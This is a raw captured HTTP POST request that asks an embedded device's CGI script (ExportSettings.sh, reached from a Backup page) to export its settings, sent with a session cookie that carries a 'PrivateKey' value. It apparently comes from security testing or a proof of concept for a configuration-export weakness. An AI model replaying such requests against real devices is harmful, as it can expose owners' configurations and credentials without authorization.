POST /cgi-bin/ExportSettings.sh HTTP/1.1
Host: 192.168.33.38:32935
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Origin: http://192.168.33.38:32935
Connection: keep-alive
Referer: http://192.168.33.38:32935/Backup.html
Cookie: uid=0jYxBrjCNp; PrivateKey=5D7864723F6D261E02095D964FA05B5C; timeout=4
Upgrade-Insecure-Requests: 1

Export=Export